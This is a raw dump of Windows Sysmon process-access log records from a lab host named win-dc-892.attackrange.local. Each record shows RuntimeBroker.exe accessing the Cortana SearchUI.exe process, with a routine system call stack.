12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006899Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006898Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006897Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006896Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006895Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006894Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006893Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006892Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006891Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006890Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006889Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006888Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006887Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.633{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 